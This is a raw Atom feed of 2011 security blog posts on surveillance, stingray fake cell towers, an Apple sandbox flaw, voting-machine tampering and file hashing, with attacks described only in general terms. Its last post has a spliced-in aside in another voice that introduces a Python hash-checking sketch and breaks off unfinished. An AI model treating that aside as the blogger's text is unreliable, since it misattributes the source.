The store has apologized for the trauma the woman and her children endured; however, the damage is done.&lt;br /&gt;&lt;br /&gt;On top of everything else, shopping malls now want to &lt;a href="http://arstechnica.com/business/news/2011/11/were-watching-malls-track-shoppers-cell-phone-signals-to-gather-marketing-data.ars" target="_blank"&gt;track your every movement&lt;/a&gt; using the unique RF signal given off by your mobile phone. Select malls have begun setting up sensors at various points in the mall and collecting 'marketing data' to know where shoppers are going during their shopping expeditions. Of course the mall has graciously informed shoppers that the system is 'completely anonymous.' If shoppers don't speak up by boycotting malls employing this technology, it'll just be a matter of time before it winds up in every mall in the country. &lt;br /&gt;&lt;br /&gt;Do yourself a favor- give cash! &amp;nbsp; &lt;i&gt;It's the most wonderful time of the year...&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;UPDATE 11.28.11: &lt;a href="http://arstechnica.com/tech-policy/news/2011/11/mall-owners-pull-plug-on-cellular-tracking-for-now.ars" target="_blank"&gt;Mall Owners Have Agreed to Kill Their Tracking Program&lt;/a&gt;&lt;/b&gt; &lt;/i&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Sg16VfC7euo/TtKKV6cTCqI/AAAAAAAAACk/6I7OFtrTwaM/s1600/moneygift1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-Sg16VfC7euo/TtKKV6cTCqI/AAAAAAAAACk/6I7OFtrTwaM/s1600/moneygift1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1572206456909907525?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://paranoid-security.blogspot.com/feeds/1572206456909907525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/buyer-beware.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1572206456909907525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1572206456909907525'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/buyer-beware.html' title='Buyer Beware'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-uXYqb-KyZ7I/TtKISDHrcGI/AAAAAAAAACU/XohBZjC2_48/s72-c/Buyer-Beware2.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-6404385082399479115</id><published>2011-11-23T07:59:00.001-08:00</published><updated>2011-11-23T08:39:21.741-08:00</updated><title type='text'>Brave New World</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;The Wall Street Journal recently published an &lt;a href="http://online.wsj.com/article/SB10001424052970203611404577044192607407780.html" target="_blank"&gt;article&lt;/a&gt; detailing the booming 'electronic surveillance' industry since 9/11. In the last 10 years, the number of private firms offering hacking tools to world governments has grown from virtually nothing to a whopping $5B industry. 
Obviously governments now recognize the value of information; interestingly enough, however, the companies selling these products refuse to acknowledge who their customers are.&lt;br /&gt;&lt;br /&gt;Without a doubt it is unethical for someone to use a zero-day exploit to install a trojan with a key-logger on your computer. However, what if this were done by a governmental agency; does that make it OK? The question of ethics is obviously something to address here since now governments are employing tactics typically used by criminals to spy on their own citizens.&amp;nbsp; In the United States we do have &lt;i&gt;some&lt;/i&gt; protections, however, as warrants are typically required before any evidence can be collected. Also, if the company is based in the US, export restrictions prohibit the sale of espionage products to blacklisted countries.&lt;br /&gt;&lt;br /&gt;However, if the company producing such equipment (or software) were headquartered in a country without export restrictions, well then game on.&amp;nbsp; Now don't think for a second that all countries have strictly controlled export lists for classifying such tools. In fact, in the United Kingdom, such restrictions currently &lt;a href="http://www.theregister.co.uk/2011/11/23/surveillance_software/" target="_blank"&gt;do not exist&lt;/a&gt;- meaning that if one were to develop a 'legitimate' yet less-than-ethical tool, he could then profit by selling the tool to a rogue state, say Iran (for example), where the tool could then be used against the citizens of said country without any repercussions.&lt;br /&gt;&lt;br /&gt;Unfortunately the bottom line here is that really nothing is safe: laptops, desktops, mobile platforms and even cloud resources are all susceptible targets. As if worrying about criminals trying to steal personal information weren't enough, we've now got to be concerned about governments abusing their powers for 'the greater good.' 
Realistically most people probably have nothing interesting that criminals or governments would really want - but that really is not the point here. The point is that spying on people without their knowledge is unethical and illegal; just because a well-funded three-letter organization is behind the attack does not make it OK. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-6404385082399479115?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/6404385082399479115/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/brave-new-world.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6404385082399479115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6404385082399479115'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/brave-new-world.html' title='Brave New World'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-4701507712034178168</id><published>2011-11-13T22:47:00.001-08:00</published><updated>2011-11-13T23:48:41.694-08:00</updated><title type='text'>Bad Apple</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="separator" 
style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uebDhrLvQJk/TsDHFZohhyI/AAAAAAAAACM/gFsBlwsicDU/s1600/rottenapple2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-uebDhrLvQJk/TsDHFZohhyI/AAAAAAAAACM/gFsBlwsicDU/s320/rottenapple2.jpg" width="259" /&gt;&lt;/a&gt;&lt;/div&gt;At BlackHat Japan in 2008, &lt;a href="http://en.wikipedia.org/wiki/Charlie_Miller_%28security_researcher%29" target="_blank"&gt;Charlie Miller&lt;/a&gt; disclosed a vulnerability in the way MacOS handled &lt;a href="https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf" target="_blank"&gt;sandboxing&lt;/a&gt; applications. Charlie had found out that Apple's definition of sandboxing was a little different from that of the rest of the world, resulting in a false sense of security for the user. Instead of applications being restricted to their own distinct memory address space, malicious code could potentially be used to spawn new processes outside of the 'sandbox.'&lt;br /&gt;&lt;br /&gt;In response to the findings, Apple modified their operating system (at the time) so that the vulnerability could not be triggered. Well, it turns out that 3 years later, Apple still hasn't learned to fix the issue. In September 2011 researchers from Core Security published a &lt;a href="http://www.coresecurity.com/content/apple-osx-sandbox-bypass" target="_blank"&gt;report&lt;/a&gt; to Apple detailing vulnerabilities in MacOS' sandboxing mechanism that were very similar to what Charlie Miller had reported several years earlier. 
The difference, however, is that this time Apple has chosen not to address the issue.&lt;br /&gt;&lt;br /&gt;These revelations come just weeks ahead of Apple's proposed launch of the new Mac Store, where users can purchase and install applications on their laptop and desktop systems, similar to how iPhones do today. As if this weren't bad enough, last week Apple actually &lt;a href="http://www.eweek.com/c/a/Security/Apple-Suspends-Veteran-Researcher-from-iOS-Dev-Program-for-Exploiting-a-Bug-489867/" target="_blank"&gt;banned Charlie Miller&lt;/a&gt; from their software development program for disclosing a bug in iOS which would allow an 'Apple Approved' AppStore download to execute unsigned (and potentially malicious) code on the iPhone &amp;amp; iPad platforms.&lt;br /&gt;&lt;br /&gt;This goes to show that Apple really is not interested in providing a secure product, only in profits. Personally, I suspect Apple is trying to keep this all hush-hush so as not to worry their fan base; however, in my opinion, the approach is borderline negligent. Apple has no problem launching a service whereby they stand to rake in millions of dollars, however, they do not want to take the time to repair their operating systems' security flaws first. For a company to neglect to issue a patch and then 'punish' a security researcher for disclosing a flaw in their system is absolutely asinine. 
Apple is playing with fire; it is no longer a question of 'if' but only 'when' they will answer for their actions.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://1.gvt0.com/vi/ynTtuwQYNmk/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ynTtuwQYNmk&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/ynTtuwQYNmk&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-4701507712034178168?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/4701507712034178168/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/bad-apple.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/4701507712034178168'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/4701507712034178168'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/bad-apple.html' title='Bad Apple'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-uebDhrLvQJk/TsDHFZohhyI/AAAAAAAAACM/gFsBlwsicDU/s72-c/rottenapple2.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-8574149601517806294</id><published>2011-11-09T17:08:00.000-08:00</published><updated>2011-11-09T17:08:41.408-08:00</updated><title type='text'>Keep Your Friends Close</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;In September of this year TED published a speech given by &lt;a href="http://www.ted.com/talks/misha_glenny_hire_the_hackers.html" target="_blank"&gt;Misha Glenny&lt;/a&gt; on why businesses should hire hackers to manage their security systems. During the talk, Glenny discusses several examples of hackers that were found on the wrong side of the law. The part of this story that I found interesting however, is that most of these attackers had a warped sense of justice. The logic goes that, since most of these hackers gained their computer skills as young teenagers, their sense of right vs. wrong hadn't fully formed yet. All of the people discussed in the report served time in prison; however, most stated that had they ever been offered legitimate jobs in computer security, they wouldn't have resorted to criminal activity.&lt;br /&gt;&lt;br /&gt;Apparently the message has been heard, as &lt;a href="http://www.wired.com/dangerroom/2011/11/darpa-hackers-cybersecurity" target="_blank"&gt;federal agencies&lt;/a&gt; and &lt;a href="http://www.rtncyberjobs.com/" target="_blank"&gt;defense contractors&lt;/a&gt; have begun looking to the hacker community for the best and brightest. In exchange for services rendered, said hacker receives a steady paycheck and more importantly, isn't busy causing mischief. 
Personally I'm all for these types of recruiting efforts as they create a paradigm shift among young generations. Ten years ago, the FBI attended Black Hat to arrest people on their naughty list; this year they had a booth and were accepting applications. &lt;br /&gt;&lt;br /&gt;Corporations, too, should adopt similar policies to encourage hackers to use their skills for good rather than evil. Bug bounty programs are a great example of how we can change the mentality that 'hackers are bad.' Companies like &lt;a href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html" target="_blank"&gt;Google&lt;/a&gt;, &lt;a href="http://www.mozilla.org/security/bug-bounty.html" target="_blank"&gt;Mozilla&lt;/a&gt;, and even &lt;a href="http://www.facebook.com/whitehat/bounty/" target="_blank"&gt;Facebook&lt;/a&gt; have all taken a proactive approach to bettering their own security while rewarding white hats for their efforts. Programs like this are good for the industry and for the hacker community; after all, we've tried the alternative and that obviously hasn't worked...&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-wv0im72htqs/Trsjd2cS8JI/AAAAAAAAABs/f4o6cPfbgGk/s1600/white_hat_hacker_cartoon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="307" src="http://3.bp.blogspot.com/-wv0im72htqs/Trsjd2cS8JI/AAAAAAAAABs/f4o6cPfbgGk/s320/white_hat_hacker_cartoon.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-8574149601517806294?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/8574149601517806294/comments/default' title='Post Comments'/><link 
rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/keep-your-friends-close.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/8574149601517806294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/8574149601517806294'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/keep-your-friends-close.html' title='Keep Your Friends Close'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-wv0im72htqs/Trsjd2cS8JI/AAAAAAAAABs/f4o6cPfbgGk/s72-c/white_hat_hacker_cartoon.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-409067543811469257</id><published>2011-11-04T14:13:00.000-07:00</published><updated>2011-11-04T15:12:23.280-07:00</updated><title type='text'>Illegal Search &amp; Seizure</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;According to the &lt;a href="http://en.wikipedia.org/wiki/Fourth_Amendment_to_the_United_States_Constitution" target="_blank"&gt;Fourth Amendment&lt;/a&gt;, any US government agency wishing to collect evidence against a suspect is required to obtain a search warrant based upon credible intelligence. Any 'evidence' gathered without said warrant is inadmissible in court and therefore cannot be used to convict a suspect. 
This seems perfectly reasonable and is taught to children across the USA as early as 6th grade.&lt;br /&gt;&lt;br /&gt;Unfortunately, it seems the FBI does not like this part of the constitution and instead has opted to put a system in place to &lt;a href="http://www.wired.com/threatlevel/2011/11/feds-fake-cell-phone-tower/" target="_blank"&gt;spy on cellular communications&lt;/a&gt; without ever seeking a warrant. The system generically known as 'stingray' is essentially a Man-in-the-Middle attack against CDMA cellular networks. By setting up rogue towers (access-points) to look like legitimate provider towers, unknowing citizens connect to the FBI's tower and transmit their telephone conversations / data, which are then relayed to the actual tower.&lt;br /&gt;&lt;br /&gt;Despite being illegal and evil, the system does sound pretty ingenious; I mean, realistically no one ever verifies whether the tower they're connected to is actually run by their provider. The problem I have, however, is that based upon the &lt;a href="http://www.mobileprivacy.org/wp-content/uploads/2011/11/Rigmaiden_Morrison-Affidavit-on-Spy-Tech.pdf" target="_blank"&gt;affidavit&lt;/a&gt; filed by Special Agent Bradley Morrison, head of the 'Tracking Technology Unit,' the FBI logged a TON of data on people who were not under investigation (basically everyone that connected to the rogue tower). The implications are that an ongoing investigation could potentially identify &lt;i&gt;interesting&lt;/i&gt; information about a completely different person (who was not on the FBI's radar). &lt;br /&gt;&lt;br /&gt;Once again, this story will get practically zero media exposure, meaning a legitimate debate on the legality will likely never see the light of day. 
I imagine most Americans would probably have a lot to say about this if the story ever aired on CNN!&amp;nbsp; This is clearly a case for the ACLU as it directly violates the rights of innocent citizens; let's hope someone from their office catches whiff of it and decides to fight the good fight.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-d54o-IhY8wg/TrRjO6GvrGI/AAAAAAAAABk/Qw_LS6_kiI8/s1600/polls_Civil_Liberties_2414_725477_answer_3_xlarge.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-d54o-IhY8wg/TrRjO6GvrGI/AAAAAAAAABk/Qw_LS6_kiI8/s320/polls_Civil_Liberties_2414_725477_answer_3_xlarge.jpeg" width="226" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-409067543811469257?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/409067543811469257/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/illegal-search-seizure.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/409067543811469257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/409067543811469257'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/11/illegal-search-seizure.html' title='Illegal Search &amp; Seizure'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-d54o-IhY8wg/TrRjO6GvrGI/AAAAAAAAABk/Qw_LS6_kiI8/s72-c/polls_Civil_Liberties_2414_725477_answer_3_xlarge.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-8423665258432519640</id><published>2011-10-30T23:34:00.000-07:00</published><updated>2011-10-30T23:35:51.220-07:00</updated><title type='text'>War Games</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;October 2007: An American &lt;a href="http://landsat.gsfc.nasa.gov/about/landsat7.html"&gt;imaging satellite&lt;/a&gt; floating thousands of miles above the Earth is attacked, interfering with NASA's communications capabilities. After over ten minutes of communications loss, NASA engineers are finally able to regain control of the satellite, however no one really knows what occurred to cause the transmission loss. After a year-long investigation into the source of the 'glitch' it becomes apparent that this accident was no accident...&amp;nbsp; &lt;br /&gt;&lt;br /&gt;One year later, a &lt;a href="http://terra.nasa.gov/"&gt;second&lt;/a&gt; American imaging satellite is again attacked resulting in a similar communications loss. After a thorough investigation, the attacks are traced back to a ground station in Norway. Two additional attacks will occur in the next few years with similar effect. As intelligence agencies scramble to protect the eyes-in-the-sky it becomes apparent that the attackers are much more sophisticated than usual. These hackers are skilled, well funded and well trained; they know the systems well and have penetrated layers of defenses to gain access. 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;October 2009: Northrop Grumman publishes a &lt;a href="http://www.uscc.gov/researchpapers/2009/NorthropGrumman_PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf"&gt;report&lt;/a&gt; to the US-China Economic &amp;amp; Security Commission detailing the capabilities of the Chinese government to conduct cyber warfare and computer network exploitation. In the report Northrop lists espionage as the main driving factor in motivating state-sponsored attacks such as these.&lt;br /&gt;&lt;br /&gt;Based upon the investigation conducted when writing the report, the attacks may have been preventable had proper security mechanisms been put into effect. According to the report:&lt;br /&gt;&lt;i&gt;"These operations are succeeding in part because current industry and US government information security paradigms are largely based on reactive controls such as traditional signature-based anti-virus vendor models, common host and network defensive measures that are often inadequate against advanced attackers."&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;This &lt;a href="http://www.businessweek.com/news/2011-10-27/chinese-military-suspected-in-hacker-attacks-on-u-s-satellites.html"&gt;story&lt;/a&gt; is a good example of what can happen when security is not taken seriously and properly implemented. On one hand I can sympathize with the victim; they tried to protect their assets. Problem is their attackers were trying harder. 
Lesson learned: No system is unbreakable; with enough determination and time &lt;u&gt;anything&lt;/u&gt; can be compromised.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-LM46odzI_FI/Tq5BcghZ8LI/AAAAAAAAABc/358pFiuW8x8/s1600/cyberwar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://2.bp.blogspot.com/-LM46odzI_FI/Tq5BcghZ8LI/AAAAAAAAABc/358pFiuW8x8/s320/cyberwar.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-8423665258432519640?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/8423665258432519640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/war-games.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/8423665258432519640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/8423665258432519640'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/war-games.html' title='War Games'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://2.bp.blogspot.com/-LM46odzI_FI/Tq5BcghZ8LI/AAAAAAAAABc/358pFiuW8x8/s72-c/cyberwar.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-5676867391191327855</id><published>2011-10-23T18:38:00.000-07:00</published><updated>2011-10-23T18:38:04.084-07:00</updated><title type='text'>The Will of the People</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;br /&gt;Last month, the 'Vulnerability Assessment Team' from &lt;a href="http://www.ne.anl.gov/capabilities/vat/election-security/"&gt;Argonne National Laboratories&lt;/a&gt; released a report indicating that &lt;i&gt;modern&lt;/i&gt; electronic voting machines could easily be compromised. The attack is implemented through a hardware bypass requiring about $10 worth of parts and an 8th-grade level of electronics knowledge. The team went on to describe how for an additional $16 a wireless system could be integrated to allow the attacker to sit as far as a 1/2 mile from the voting booth. &lt;br /&gt;&lt;br /&gt;What's interesting about this attack is that it's virtually impossible to detect. The attacker would only need access to the voting equipment for a few minutes in order to install the device, then return again after the election to retrieve the device. Since most voting booths are located at elementary schools and in church basements, getting access to the devices before an election is somewhat trivial. If a group of attackers were clever, they could send in a few folks a few minutes before polls close to retrieve the hardware, or simply volunteer to work the election at that time.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hackingdemocracy.com/"&gt;In the past&lt;/a&gt;, most attempts at corrupting electronic voting systems relied upon installing a piece of software, kind of like a virus of sorts, which could easily be detected later. 
Since this is a hardware man-in-the-middle bypass, once the hardware has been removed from the machine, it is impossible to detect. Once again, this story has not received nearly the amount of media attention it deserves. It is curious that something this important would fall by the wayside and not be reported on...&lt;br /&gt;&lt;br /&gt;Thomas Jefferson once said 'The will of the people is the only legitimate foundation of any government, and to protect its free expression should be our first object.' Unfortunately it looks like modern politicians have no intentions of protecting democracy by outlawing electronic voting machines (probably because they rely on these systems to get elected in the first place). Hopefully people will wise up and realize that these machines are not at all safe and will refuse to use them come election day.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/DMw2dn6K1oI/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/DMw2dn6K1oI&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/DMw2dn6K1oI&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-5676867391191327855?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/5676867391191327855/comments/default' title='Post Comments'/><link rel='replies' 
type='text/html' href='http://paranoid-security.blogspot.com/2011/10/will-of-people.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/5676867391191327855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/5676867391191327855'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/will-of-people.html' title='The Will of the People'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-6779135987223157491</id><published>2011-10-21T12:06:00.000-07:00</published><updated>2011-10-21T13:23:43.702-07:00</updated><title type='text'>Give Hash a Chance</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;It recently occurred to me that most people probably have no idea what a cryptographic hash is or what it's used for. For those of you that don't know, a hash is simply a one-way mathematical computation that produces a unique fingerprint, used to ensure the hashed item has not been tampered with. Hashes are used for two purposes really: to verify the integrity of files (as discussed here) and as a method of securely transmitting passwords without actually sending the password (I'll discuss this another day...).&lt;br /&gt;&lt;br /&gt;Wouldn't it be great if web browser developers educated the masses on the importance of verifying hash values on files they download? 
Think about it - Microsoft, Mozilla, Google, Apple - all they'd really have to do is add a small script to compute MD5 or SHA-1 values on files after they've been downloaded and display a message to the user showing the calculated value. The value could be displayed right in the download window allowing users to easily see the hash next to the file name. &lt;br /&gt;&lt;br /&gt;People would inevitably wonder what that weird string of characters next to their file name is. From there hash education would be born. As more consumers became savvy to what hash values are used for they'd begin to demand web sites publish the hash values of files they're posting. The amount of infected files downloaded would then decline as more people were educated.&lt;br /&gt;&lt;br /&gt;Now I understand this method is not foolproof; for one, if someone were to get access to a webserver to post an infected file, he could undoubtedly also post the corresponding hash value. 
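As an added illustration (not code from the original post), here is a Python sketch of the check the paragraphs above propose: hash a downloaded file, produce the values a download window could show next to the file name, and compare one of them with a published hash. The sample file and its tampered copy are constructed for this example, and SHA-256 is included alongside the MD5 and SHA-1 the post names because neither of those is collision resistant any more. The last case in demo() reproduces the caveat just stated: when the same party controls both the file and the published hash, the check passes, which is why a hash proves integrity but not who produced the file.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed sample "download": a tiny shell script standing in for a real file.
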